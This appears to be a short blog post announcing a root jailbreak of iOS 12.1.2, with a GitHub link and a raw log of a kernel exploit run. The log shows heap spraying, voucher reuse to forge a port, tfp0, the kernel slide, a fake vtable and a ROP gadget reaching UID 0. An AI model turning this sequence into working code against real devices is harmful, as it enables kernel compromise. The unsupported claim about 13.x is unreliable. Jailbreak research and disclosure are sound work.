Come back!

iPhone 12.1.2: Successfully rooted
Show file root: https://github.com/ux0rdev/ux0rJail

13.x: Bypassing Apple file system protection
Solving the problem of waiting for a kernel panic ...

Log file:

D platform: iPhone8,1 16C101
+ created 1024 pipes
+ created 8000 ports
+ sprayed 16646144 bytes to 1016 pipes in kalloc.16384
+ created 3564 vouchers
+ sprayed 315752448 bytes to 8 ports in kalloc.1024
+ stashed voucher pointer in thread
...........................................................................................................................................................................
+ sprayed 357924864 bytes of OOL ports to 4 ports in kalloc.32768
+ recovered voucher port 0x2e8207 for freed voucher
+ adding references to the freed voucher to change the OOL port pointer
+ receiving the OOL ports will leak port 0x1ec003
+ received voucher port 0x2e8207 in OOL ports
+ voucher overlapped at offset 0x7ca0
+ received fake port 0x971b
+ port is at pipe index 169
+ got ip_requests at 0xffffffe0066c60a0
+ fake port is at offset 12600
+ base port is at 0xffffffe006a07138
+ kernel_task is at 0xffffffe00050d680
+ done! port 0x971b is tfp0
Noncereboot Baslatiliyor...
D found kernel slide 0x0000000002800000
slide: 0x0000000002800000
got user client: 0x980f
Found port: 0xffffffe006a051b8
Found addr: 0xffffffe005f0ed40
Found vtab: 0xfffffff009665da8
Created fake_vtable at ffffffe0000c8000
Copied some of the vtable over
Created fake_client at ffffffe0000cc000
Copied the user client over
Wrote the `add x0, x0, #0x40; ret;` gadget over getExternalTrapForIndexour proc is at 0xffffffe00693e7b0
kern proc is at 0xfffffff009e6c988
D UID: 0

Tags from other blogs: security, iPhone, rooting